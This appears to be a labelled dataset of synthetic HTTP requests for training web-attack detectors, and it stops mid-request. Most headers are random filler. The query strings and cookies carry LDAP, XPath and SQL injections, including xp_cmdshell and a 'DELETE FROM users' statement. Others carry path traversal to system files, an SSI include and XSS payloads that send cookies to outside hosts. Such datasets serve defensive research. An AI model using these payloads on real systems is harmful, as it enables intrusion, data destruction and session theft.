UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 707x739
Via: aAgh/4.6 154.170.231.53
Transfer-Encoding: gzip
Upgrade: uoE/5.1, iitjl/6.0
Warning: 381 69.182.116.155 "Nlsokote2jdearNL" "Fri, 14 Nov 08 18:53:43 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37848
Start - Id: 38304
class: LdapInjection
GET /copyPtQHxH1tvarK/t3mTZxF/ghdzslo9ifahHmt.css?urr=%29%28%7C%28++cn%3D*o+%27brien*++++%29%28mail++++%3D*o+++%27brien*+++%29 HTTP/1.1
Host: 225.167.117.225
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: n4ysCPe-r1xe;q=0.1
Cache-Control: only-if-cached
Client-ip: 125.61.79.193
Cookie: exhess=htpass>@hsaoi5 a;eistiga0g=8;hrxtyez=s >ItssystemSa2p7wrotn;inl5nea=f;tni=66jeb
Cookie2: $Version="499"
Date: Fri, 25 Feb 05 24:56:21 CET
ETag: W/"-ggdckprLkOtw2iG"
Expect: toiyoGhn=matn
From: ctbt@euirsarao.st
If-Modified-Since: Sun, 12 Dec 04 21:57:07 UTC
If-Unmodified-Since: Tue, 26 Sep 06 19:31:40 UTC
If-Match: *
If-None-Match: "ap8nXcXyeEHgHSn"
If-Range: "NbfNS-Q36.5oMT.U"
Max-Forwards: 901
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: NTLM cUljbGk0TmFpMmlsaXBhbnRldEF5bmFldGVBY3QyY25pY3NuaUhtbzlSYWVsbG90
Range: 187604-278577,03540-,87-
Referer: http://www.henxn.fr/miefse/tyqla/fsaor/nolddt.mpg
TE: deflate,gzip;q=0.0,gzip
Trailer: From
User-Agent: Mozilla/8.2 (compatible; MSIE 3.4; WinNT; hwgntTeee0; ruieqYUn; ny5ae)
UA-CPU: 68000
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: 4.6 www.Etli.tiff, 3.5 www.adtettaf.css:6
Transfer-Encoding: identity
Upgrade: d7t/5.9, eblyng/3.2, 5nhqs/0.7
Warning: 689 170.117.141.73 "aedmi" "Sun, 23 Jul 06 24:48:31 CET"
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38304
Start - Id: 49952
class: XPathInjection
GET /n@3N/ebB.e.s8H5lF/eEs_QsUp.JiEZ/tMsfl/rjeAp/QTX/htwnc5eg.tiff?9mmeouhseft=27&thoiuyeioltoqg=input%3Dct-&SWwqkLc=47919171&rAavwEh=%7E%27aefe%2F2f1sWb%24r&dstuna1iaa=3v%27%5D+%7C++P+++%7C+%2F%2Fuser%5B+++name%2Ftext%28++%29++%3D++%27sna&sRnJtat4Tsmhwie=nsir%5Csa&eAeosjg=NRselectirnatecIu%25u&Ro4imqoq6Iswo=8892&eaf3rEHmern=anki+&sDODUb9winntJQ=d6m&acaeder=nwjAdri&hecioot9=Tid&nw6era3kdwmif1H=eoeslOdn HTTP/1.1
Host: 145.74.100.94
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: macintosh, x-mac-chinesesimp, koi8-r;q=0.3, x-mac-ce;q=0.0
Accept-Encoding: gzip;q=0.7, gzip;q=0.2, gzip, gzip
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 6.57.199.123
Cookie: betweenQfjtmpsn=1156
Cookie2: $Version="9"
Date: Sun, 07 Feb 10 15:31:23 UTC
ETag: W/"Iy_DNmlUhoJDmsXeKRd"
Expect: 100-continue
From: thnep@gnfilnelrR.biz
If-Modified-Since: Wed, 16 Apr 08 08:27:21 GMT
If-Unmodified-Since: Mon, 07 Mar 05 10:51:09 CET
If-Match: *
If-None-Match: "zNX.NeWuwJFY-Fw."
If-Range: Thu, 07 Jul 05 13:36:03 CET
Max-Forwards: 6488
MIME-Version: 0.7
Pragma: Rw=meqtbnet
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: evwOlt lsy3mt=9sciu
Range: 33-0
Referer: http://REAtehn.com/8Cshaia0/afef/0eayFsE/wuig3p.swf
TE: trailers,deflate;q=0.2,gzip;q=0.8
Trailer: If-Modified-Since
User-Agent: Mozilla/5.1 (Windows; U; Win 9x 1.9; 0W-dc; rv:6.7.6) Gecko/42978031
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 299x2707
Via: FTP/9.3 www.9goxeoae.tiff
Transfer-Encoding: wtev
Upgrade: d4T/6.8, oecM/8.1, tgey/1.2, v4dyl/2.5
Warning: 328 www.idba.shtml "ar0Wumgg2hao" 
X-Forwarded-For: 43.162.129.161
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49952
Start - Id: 36040
class: PathTransversal
GET /o2ecxsff8ehh4Yr4ba.png?npi=..%2F..%2F..%2FWINNT%2Fautoexec.bat&1x6LeOB8ORS=sandnafiggy9%40Ja+ HTTP/1.1
Host: 139.51.14.132
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-3, windows-874
Accept-Encoding: deflate, identity;q=0.4, gzip;q=0.9, identity;q=0.6
Accept-Language: *;q=0.8
Cache-Control: max-stale=691
Client-ip: 87.93.92.255
Cookie: eenkanrersfeg=8283;hpd=asaNl;uyl7Nmu1tbbesr=21;csc6ow=tar&<7uQsfgO\tb
Cookie2: $Version="0"
Date: Wed, 12 Nov 08 23:48:04 UTC
ETag: W/"P5A5n3U1b3aq0p8"
Expect: 100-continue
From: ilse1tt1@jeTlb.biz
If-Modified-Since: Mon, 19 Apr 04 21:45:25 GMT
If-Unmodified-Since: Sat, 03 Dec 05 08:15:20 CET
If-Match: *
If-None-Match: *
If-Range: "C7VLLCUl8Gc4SXt5"
Max-Forwards: 8964
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: nizw 8I6iiEN3=seei95mG
Range: 709-485
Referer: /uvnht/od6t3mh/Tkylo/eD1cluss/Vdpacwmj.asmx
TE: trailers
Trailer: If-Match
User-Agent: 6o1jdABL http://www.lmda7jse.it
UA-CPU: PowerPC
UA-Disp: 1024,515,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 745x4826
Via: FTP/4.0 185.69.198.91
Transfer-Encoding: nmmute; ihiem6cs=aes3ofsm
Upgrade: tztr/1.1, esid/8.4, 6ktsdr/4.4, Ipqst/0.4
Warning: 147 www.drndra.tiff "Slyqiecbrsiea" "Wed, 18 May 05 16:14:14 UTC"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 83480
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36040
Start - Id: 44357
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: www.eccibAfrgS.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=10
Client-ip: 206.144.99.228
Cookie: Btizoslto91er=cmdyxli
Cookie2: $Version="4"
Date: Sat, 11 Sep 04 02:00:35 GMT
ETag: "Mp0.89pM9u@RmCsjjuH"
Expect: 100-continue
From: oehrc@o8se.com
If-Modified-Since: Wed, 27 Jan 10 06:09:38 CET
If-Unmodified-Since: Fri, 09 Nov 07 02:11:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 57
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest response="750EEeFddf3CD4eDAAABC5d54CeAD4BE"
Range: 40819-,5068-402487,51311-585888
Referer: /jTvee/ohrSke.conf
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: 4jt78o (oLyBf7CH; e3DGgA2x)
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.nea5ttS.css, sywoe/1.4 19.129.86.156:6, 8.9 73.48.109.8
Transfer-Encoding: identity
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44357
Start - Id: 44702
class: PathTransversal
POST /ZiKHhJ/pnoerwsA8/ooeeedsoudn/mfn/tKmel/su5having/wVEa8SgZv5xE-3Mshk/oS-P1bONC/aqKWS4Nb/ta3CaBgW/wuth.asmx? HTTP/1.1
Content-Length: 149
Content-Language: toygaas
Content-Encoding: compress
Content-Location: /ereticq/tdsr4R/esoemh/dppaxoL.gif
Content-MD5: eEVseXJsY0hnaHNwRHVmYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Jan 08 06:56:56 GMT
Last-Modified: Sat, 15 Jan 05 18:45:07 CET
Host: www.8s6ilmaia.biz
Connection: close
Accept: image/*;q=0.0, audio/*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 159.172.8.1
Cookie: onytsai7iet=l;09ukQ4NV7s2=3465;inorFnh4=3;iw6amgoaEheytn=r9tecsaKsrlIzF
Cookie2: $Version="90"
Date: Tue, 20 Nov 07 10:36:16 GMT
ETag: W/"LMhgcAcKZubNHyMAZq"
Expect: lnumHot=vabdgrue;cMiuP
From: aiino4r@HoCiOqeo.be
If-Modified-Since: Mon, 12 Jan 09 01:26:50 CET
If-Unmodified-Since: Fri, 09 Jan 04 03:21:00 CET
If-Match: "WXjkkPsXRdB4BiyX"
If-None-Match: *
If-Range: Tue, 20 Jan 04 09:57:24 UTC
Max-Forwards: 487
MIME-Version: 8.4
Pragma: htmjegse='Edo0'
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: Digest opaque="heuedq"
Range: 8542-,-709
Referer: http://tjNsy.it/9lOtekl/noXIaier/eNmroSlg.dll
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: n8zJAk1V http://www.rirrlo8c.gov
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 770x653
Via: 8.9 193.116.9.112
Transfer-Encoding: compress
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 857 185.30.26.113 "mesibeEtevaqn" "Sun, 20 Apr 08 19:11:08 GMT"
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 145776
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

ptnu7Sjee4q=<t6) tartep&0d8arre=a~hl&Ecopyl&hltache=y1aro&onb=Uihue&hdmdE&str=../../../reolal/admin.txt&3lJG=n\ro&soejrusnn=p6t  

End - Id: 44702
Start - Id: 37433
class: LdapInjection
GET /hfGerhn6f3shtd4T/atd5rahtci4/iephghsutas/brHsEBn/1JAIfr/rKALn1U@ebqvWGU2/ldteIeTescogiis/k7L.fUsGX-eqfP3-Cr/EoQzAXKxlikehOm8/714EstyleFH/iMY2iqz2LAp.nsf?t9XZNT4exec2pa=qt&ihrcow=iahgroup+by+g%2Fonn&zm594Kv1=e4tTelinkAoee&hathew=hytnn%3B%5Ctses&ntsrjt2=aGVTIftU&ENaihuogoat=vs%2Brulie HTTP/1.0
Host: www.stoanm1.biz
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: iso-8859-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 69.34.202.23
Cookie: xhimheeoOai6t=dQGly-bj8sC;iztN1dPtoe=8;likeNJP0dzn=8960)(&(objectClass=e7l)(|(sn =  me)(cn=he   J*))
Cookie2: $Version="575"
Date: Wed, 02 Mar 05 17:45:10 CET
ETag: W/"MN_sySINsXDW-1mHu"
Expect: arews19T
From: atarlip@e8r6llry.be
If-Modified-Since: Thu, 23 Nov 06 08:54:07 CET
If-Unmodified-Since: Mon, 15 Dec 08 12:52:54 CET
If-Match: "5ZCqhsBo6maO25DQ"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 0.7
Pragma: r4awl=i0xxd
Proxy-Authorization: NTLM bjRpdGJIOWFlczZmdHBubnJvZHJ2ZWVvMXM5bmFuaGlqZW50b2R4Y2Y5OW9jVw==
Authorization: Digest response="cEb8F4EFFF0aF7A2c3D9C97C32E3DA3d"
Range: -35593,-698,-52148
Referer: http://www.czx0lz.ch/oore.swf
TE: deflate,trailers
Trailer: Connection
User-Agent: oedoeeln2TErgibo0
UA-CPU: 68000
UA-Disp: 7901,3624,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7873x595
Via: 0.7 60.98.17.198
Transfer-Encoding: identity
Upgrade: tsUg/3.0, gimoE/9.9
Warning: 328 46.107.172.244:13 "5tYNejmdwhs9lNi1" 
X-Forwarded-For: 50.151.186.172
X-Serial-Number: 662203541237
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37433
Start - Id: 41961
class: SqlInjection
GET /ekPq/0Dn/tKPRPejxtbmail0xp_s/iuE7HYa1-k/KDpg-/ssT0xnha0hlbaoe/NexecEddqeZxbgsoundFu/r17e7p/txkpteb/lWMhADuVqGrU2u6c/bsu3e/mqwyueavgtt.php3?Fn4e_IyA=tYHa4h&74eeim=aaihw8%3F%29&rsnn=teRerrWxE8nhtrpoao&nd9csdAo=ilotdh1iaheho&br=ticnOhhl%27%29%3B+++DEL%2F**%2FETE+FROM+++++users++WHERE+++upper%28username%29+%3D+++upper%28+++%27admin&feccnaevnPdafee=aoknSqisg&gheAvesetdd=r%7Elpsktr%28maisdtt&mmeodunMitnnrSe=4245376&tdeamh=rincs&ejtri=4ft3winnt&lt9nbkj=St0swlt9nr&4w=no-asgcvhNx&sUizmtiaitnmooo=4%3Cl7A HTTP/1.0
Host: www.djptsCqabA.net:5725
Connection: eerwso0g
Accept: text/xml;q=0.6, application/x-tar
Accept-Charset: utf-8, iso-2022-kr, windows-1255
Accept-Encoding: compress, gzip;q=0.1, deflate;q=0.3, deflate
Accept-Language: 4tdCrneC-umrtie;q=0.4, isi-xodeic;q=0.6, ld-a;q=0.5
Cache-Control: only-if-cached
Client-ip: 241.210.73.73
Cookie: 9XcBVs@=ebisbaof;7i5ti=scriptarthd
Cookie2: $Version="90"
Date: Fri, 01 Jan 10 20:51:47 UTC
ETag: W/"L5smUaADBs4uUok.30rh"
Expect: 2eweYa=sefI;hdtn
From: lbrsawDh@elfoa4b.fr
If-Modified-Since: Wed, 29 Oct 08 10:17:08 UTC
If-Unmodified-Since: Sat, 29 Aug 09 15:01:34 CET
If-Match: "HGuhKkWlm_XcbLAj"
If-None-Match: "lzrt-akqZh-eIEpQvG6U"
If-Range: Sun, 21 Feb 10 02:31:01 GMT
Max-Forwards: 3195
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest username="eosOeu"
Range: 170-12,11579-8643,1-
Referer: /ioeruuIj/umriA6cs/Mrmsme/eunijnt/goqxrepl.php3
TE: deflate,gzip;q=0.9,trailers
Trailer: Pragma
User-Agent: Mozilla/3.6 (Machintosh; U; PPC 1.6; i5-ns; rv:9.2.5) Gecko/84937035
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1383x317
Via: HTTP/1.5 www.hnd0o.html, FTP/2.4 88.227.154.124:765
Transfer-Encoding: compress
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 41961
Start - Id: 40523
class: SSI
GET /eOTuIWGT3_Z/oxV0kxTyn/eDp6KPjfoSr57dFwvI/OeeaaAdners8dwus1rw/dineqe5/rsonpahnmtw1etet/yromtsztnIoyare0ediz/pnjodu/aanpzo/eGuM.q.shtml?terisuacrtcnjso=28602748&idza=inr+tr97nen&utrOtac=nusrshSem&uu=rterbhtn9ant0rlol&eyu5tm=aboot.ini+script+i1n&psYheLiesDsheee=hed+ruIo&1eiherWnsO0iti=w9f4&ss653b6=elyininsertromens6+o%2Fh&doigreeet4r=o5jnoOias&Nwhdlisoi7=92460&a5rsiayS=TgcswbpC&3fci5tS=%3C%21--+%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&XeecsgiseihtsrN=2983&tmaree=04675054 HTTP/1.0
Host: 87.228.216.172
Connection: close
Accept: */*;q=0.1
Accept-Charset: windows-1258, x-mac-hebrew, gb2312
Accept-Encoding: *
Accept-Language: s-iIE0suue;q=0.1, t-Nunitrxz, Nrue-eeohn
Cache-Control: max-age=4
Client-ip: 166.14.189.36
Cookie: eoM=jnnc9yteHshm=na;D.@P=432;VC8h=pe8gw
Cookie2: $Version="2"
Date: Wed, 25 Aug 04 01:24:03 GMT
ETag: "G5thXp8xs5cDE.veI"
Expect: aqpn=wyer0sy3
From: OeTsa@undhtsdpd.it
If-Modified-Since: Tue, 25 Sep 07 08:23:03 UTC
If-Unmodified-Since: Thu, 24 May 07 09:01:53 GMT
If-Match: "@ONyKZ6B4YJ@dn3o1"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 8.6
Pragma: eawgecu=ect
Proxy-Authorization: dler dcyii=syes
Authorization: Basic amM0eDp0dklxb2F0ZQ==
Range: -112429,931-60
Referer: http://www.hdoltf.ch/Simro/AsefSes/al1ubt8/osr0r4y/eopra.swf
TE: deflate;q=0.1,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/3.9 (compatible; MSIE 9.5; Open BSD i586; oekp)
UA-CPU: Sparc
UA-Disp: 591,998,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 278x2627
Via: 5.3 www.ns25.css:3, 5.5 168.218.109.248
Transfer-Encoding: deflate
Upgrade: erf2/5.5, agh/2.9, dtoitg/7.9
Warning: 855 www.ece5Rtd.shtml "aStprsanaUieimSniow" 
X-Forwarded-For: 74.209.53.98
X-Serial-Number: 54980742436661257
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 40523
Start - Id: 40976
class: SqlInjection
GET /leu12en/dRirsI0me5Nts.jpeg? HTTP/1.0
Host: www.aieR.uk
Connection: keep-alive
Accept: image/png, text/*;q=0.0
Accept-Charset: x-mac-cyrillic;q=0.6, x-mac-greek, x-mac-cyrillic, iso-8859-6
Accept-Encoding: ';EXECmaster.dbo.xp_cmdshell'cmd.exe
Accept-Language: *
Cookie: ddt=04239;ife=38;shw=63;afgStLstsGs=89624
Cookie2: $Version="886"
Date: Fri, 29 Aug 08 10:53:15 CET
Expect: jcnei8e
If-Modified-Since: Thu, 15 Dec 05 13:37:40 GMT
If-Unmodified-Since: Tue, 19 Oct 04 11:53:05 UTC
If-Match: "ZR1-D-VHR8iHnthwIb"
If-None-Match: *
Max-Forwards: 0
Pragma: dgr=LylNnao7
Referer: http://ioTa.com/jrnRun/1sUcicsi/7mote/okwuhnit.gif
User-Agent: px5hes/4.9.6.8.3
UA-CPU: PowerPC
Via: 2.9 167.109.166.40
Transfer-Encoding: compress
Warning: 206 www.exahet.tiff "tnnU5ihiheein" 
----: -----------------------------------

null

End - Id: 40976
Start - Id: 49988
class: XPathInjection
GET /prdr/mlSXXZ0ss6CX1yo/e8V5BKROQDqfttvb/nen7lEiioeelniefo.asp?vaorstu=4111786&Nyimail4m6autoexec=i6eciher8ceei&1RVodo=wlv7n&etEnimaoher=ttz&Sa=9++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or++++354%3D&AhJC=ii%3E2dNGaar%7C&1leopamveii9=qn8inqibogLd3&oe8b4ea=%28toa+u HTTP/1.0
Host: 198.58.181.216
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: diopq-oifep;q=0.2, toe-rC4a1;q=0.4, 45ezfpwH-egi1rreh;q=0.7
Cache-Control: no-cache
Client-ip: 237.62.233.210
Cookie: 2Ih=3465;nseM=92
Cookie2: $Version="317"
Date: Thu, 10 May 07 16:45:22 GMT
Expect: 100-continue
If-Unmodified-Since: Fri, 26 Nov 04 06:31:24 UTC
If-Match: "J1aFHMN7HsDT-72_STaK"
If-None-Match: "Bc9oxVDshA7P.ZS"
If-Range: Fri, 05 May 06 24:05:08 CET
Max-Forwards: 7
Pragma: n=sdf9ieu
Authorization: NTLM ZnJleTJidGhMc2lpeGhyZW5nbmE3bG10c2FSb2JldVNhZXJpNXdrbzR3Tw==
Range: 8886-360900,-39090
Referer: /rtettm/6Uerta/yscsdhmt.pl
TE: trailers
User-Agent: Mozilla/7.7 (Machintosh; U; PPC Mac OS X 7.4; cu-9A; rv:0.1.8) Gecko/46989853
UA-Pixels: 0803x6416
Via: Eei8m/1.8 www.atea.shtml:85822, 6.8 160.22.158.126:0746
Transfer-Encoding: gzip
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49988
Start - Id: 46712
class: XSS
GET /4doqslsegm/nYDsibfeAYi1YIKlq-e/etltseoaohvDtnfsdR/IA0@_httpYcreplacerbq7@V/5lisrpkidlOonn/e77/YNok7D.cfm? HTTP/1.0
Host: 140.225.141.173:93
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, identity;q=0.3, gzip;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 175.173.101.1
Cookie: batd6attajy=usc2nirut9oltoagea;9ertrf=<input    type=    "   image    "     dynsrc =  " javascript:  [window.open('http://83.214.59.138/me.pl'+document.cookie);]    "    >;ehkd=gP5qg_kSFGC;U0aoiehmeo=t2anxe47crramStt
Cookie2: $Version="743"
Date: Tue, 02 Mar 04 02:20:20 CET
ETag: W/"wwj5LsWRDOyemLX"
Expect: hceqis
From: aOtal@stlme99nyh.it
If-Modified-Since: Mon, 01 Jan 07 09:35:45 UTC
If-Unmodified-Since: Fri, 01 Sep 06 23:25:21 GMT
If-Match: *
If-None-Match: *
If-Range: "5Wnc5p15SMSKFEiv7"
Max-Forwards: 3
MIME-Version: 2.2
Pragma: utnbCysF=nw
Proxy-Authorization: NTLM cnVpaWVhNG1kaWl2aTJ0bWQ4QW1uNmxiYzZkN3Q5Qm53dHRuczhvdExyc2k=
Authorization: Basic dWhMdHlhOm9hMmFy
Range: 42963-61
Referer: http://nasF.de/bcaa5p6y/eeeieogC/IhAyiej.asp
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.5 (compatible; Konqueror/5.7; Linux i386; 7OJhthnmgt)
UA-CPU: x86
UA-Disp: 7583,8873,32
UA-Pixels: 622x110
Via: 8.8 www.E4c8t.png, 8.8 www.1tt468.html
Transfer-Encoding: compress
Upgrade: uijt/9.8, yrqeto/4.3, thr32/0.8, l2Sej/3.5, Eigc/6.3
Warning: 351 219.37.216.100 "ohhyget8" 
X-Forwarded-For: 131.100.225.97
X-Serial-Number: 348730279
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 46712
Start - Id: 39395
class: SSI
GET /usnr8lssr.asmx?syCM=35560&tetn=tsusxdoheei&8550OYXEZlse=3335790&3HKASN4bEr=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&holb=oior%5Dooweede8r&nremEjhznctllr=18516711 HTTP/1.0
Host: 59.25.222.70
Connection: keep-alive
Accept: video/quicktime, text/*, application/*
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.1, identity;q=0.6
Accept-Language: eele3-x, gKtt-nsEhtxm, m-ibs, 3nelbhHf-e, Uli-eqa9sns;q=0.8
Cache-Control: no-transform
Client-ip: 247.66.9.211
Cookie: asbcdRosmh2jioI=<n;GdnuroRyo=IaaEict;r53=Seo
Cookie2: $Version="28"
Date: Sun, 13 Apr 08 01:35:12 UTC
ETag: "4Brn_CPTrEZ4KqY"
Expect: 100-continue
From: gdiexzng@dnnsS.com
If-Modified-Since: Sat, 25 Sep 04 02:00:18 UTC
If-Unmodified-Since: Tue, 18 Sep 07 24:40:18 UTC
If-Match: "Pe9linRaQEKa1iKcbWE"
If-None-Match: "fa6XV9CS8EvXvXVfe6c"
If-Range: Thu, 09 Oct 08 09:13:41 GMT
Max-Forwards: 0523
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: reenr ueer=altyt2
Authorization: Basic bHRzaWV0dGU6bWVpcnM5
Range: 32-500
Referer: http://www.Lmwuzs.gov/agmet/Nmhu.asp
TE: trailers
Trailer: Accept
User-Agent: heurrneno (tAR.q1868q; bnGPwv; gh.r5w2L; w6UE@dn; szCIvs4)
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 3.0 www.7ehr4n.jpeg, 7.1 www.xlcdLy.js:59, 8.6 233.141.81.121
Transfer-Encoding: moig
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 931 191.117.0.135:8 "o2emeai5i" "Wed, 18 Nov 09 03:55:48 GMT"
X-Forwarded-For: 193.181.203.122
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39395
Start - Id: 48066
class: XSS
GET /bQ/adrdewegxaehscdsoa0t/eBqe4kV/tio5suieodueY7/lp/tmozuY/eF.2KZRrprocessing-instructionkhtpassSOb-/hp0VWWAC_puR.png?aiah=aoeahm1dhsiIaue&aush9y2mripidc7=xr&linkOaS3XpYSuuO=rxrWS8-O&tsleitattjn9ia=ewh+%25ps6Oreplace%3Caxp_i&Ldswovfca6=eH0-__he&nhauenp2ai=o+a%26%29m+h+bgsoundrmt&.3-httpsOzI0N=5xe3nsesqbbtc&Udih=services&nf0sto2eetM=vihrgBLI_D&ralmdtrerhaelsk=%3Cinput+++type++%3D%22+image%22+++++dynsrc++++%3D+++%22+++++javascript%3A++++%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.li.com%2Fcgi-bin%2Fna.cgi%27%2Bdocument.cookie%29%3B%5D++++%22%3E&-GGXtmpQmBct=mailuro+ HTTP/1.0
Host: www.rr5aoondur.gov
Connection: close
Accept: */*;q=0.7
Accept-Charset: macintosh
Accept-Encoding: *;q=0.1
Accept-Language: h-tyA2a2u;q=0.2, aeaai-ae;q=0.4, Y-i
Cache-Control: euttEgn='Esei'
Client-ip: 185.80.82.48
Cookie: gt3iscccohs=81;s0a6fGMlF=nddHp;litod21eio9=heornonbhtr;weyloge3soSldab=fld;aioor=645929174;truoqnhliIipo=osai8z
Cookie2: $Version="11"
Date: Tue, 20 Apr 04 22:51:41 CET
ETag: W/"Z8MIfduBhPta2zhbD0ct"
Expect: 100-continue
From: 8en5b@ucyi.ch
If-Modified-Since: Wed, 09 May 07 22:38:06 CET
If-Unmodified-Since: Mon, 01 Nov 04 20:19:13 GMT
If-Match: "VYGRq2r4i2S0Y45u0pgG"
If-None-Match: "gqNLXdeo-YVHoePWr"
If-Range: Sat, 29 Apr 06 01:35:02 CET
Max-Forwards: 6
MIME-Version: 5.2
Pragma: aXmta5mR='h0'
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=MD5-sess
Range: 576-842445,767371-238800,-653364
Referer: http://www.8hsrnc.fr/isimf1/7ajEd/ote0ibsE/epxi/oiriDd.nsf
Trailer: Warning
User-Agent: iu71xeupV2 http://www.otelot.com
UA-CPU: x86
UA-Disp: 4437,742,16
UA-Pixels: 6001x2247
Via: b6ian/2.9 22.49.125.72, 9.8 154.110.167.73
Transfer-Encoding: identity
Upgrade: wAre6i/8.0, kmnmln/4.1, u2nAT/4.0
Warning: 634 www.yauedif.css:99300 "eQn3Xdra5ghbItoas" 
X-Forwarded-For: 69.186.228.89
~~~~~: ~~~~~~~~~~

null

End - Id: 48066
Start - Id: 49239
class: XPathInjection
GET /erWU2EnFTzfAmI.M/indlsnResNdayoe.bin?ZrRDxtermKqHRs.=TTaipo6smG3&sptoITzsht=26005089&3hcbat=jouchtpassgs5i3tklocation&i1teEeeeIjrsj8e=dsa%3B&Sadmin63yRJQ=ls%27%5D+%7C+++P+++++%7C++++%2F%2Fuser%5B+++++name%2Ftext%28%29%3D++%274ir&aoHrdeeheteaes=160613349&0pAj-s=8653&vpOPOS8Gav_V=9tt&Ttssnl=eMrs&Ef=includeeUohdbyevE-Ld&3IdiEaodn=53&on6togab=48142692&ya6m8oAe5l8h7d=mEekrt&ia=orcEote0so HTTP/1.0
Host: 27.150.214.219
Connection: close
Accept: text/*;q=0.8, text/plain;q=0.9
Accept-Charset: windows-1252;q=0.5
Accept-Encoding: 
